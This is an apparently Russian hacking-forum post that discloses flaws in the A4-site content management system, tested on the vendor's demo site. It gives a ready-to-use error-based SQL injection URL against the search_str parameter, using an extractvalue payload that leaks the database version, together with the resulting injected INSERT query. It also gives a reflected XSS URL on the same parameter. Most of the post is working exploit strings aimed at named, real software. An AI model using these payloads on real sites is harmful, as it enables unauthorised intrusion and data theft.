03.04.2014, 11:57
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
CMS A4-site
Сайт: www.a4-site.ru
Демо-версия: www.demo.a4-site.ru
Функциональность: От сайтов-визиток с минимальной функциональностью до проектов с посещаемостью в десятки и сотни тысяч посетителей в день. (c)
Стоимость: Система управления сайтом A4-Site пока не продается "в коробке". Но вы можете заказать реализацию вашего проекта на ее основе в Интернет-компании A4-Site.(c)
Исследования проводим на демо-версии.
SQL Injection
Уязвимый параметр: search_str
Вектор: error-based
Требования: mq = off
Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str='and(extractvalue(1,concat(0x3a,version())))and'&search_cond=AND]
Query:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]INSERT INTO distr_searchlog[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sl_query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_count[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_time[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_cond[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]and([/COLOR][COLOR="#0000BB"]extractvalue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"]())))and[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'AND'[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
XSS (passive)
Все тот же параметр search_str
Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str=">&search_cond=AND]
|
|
|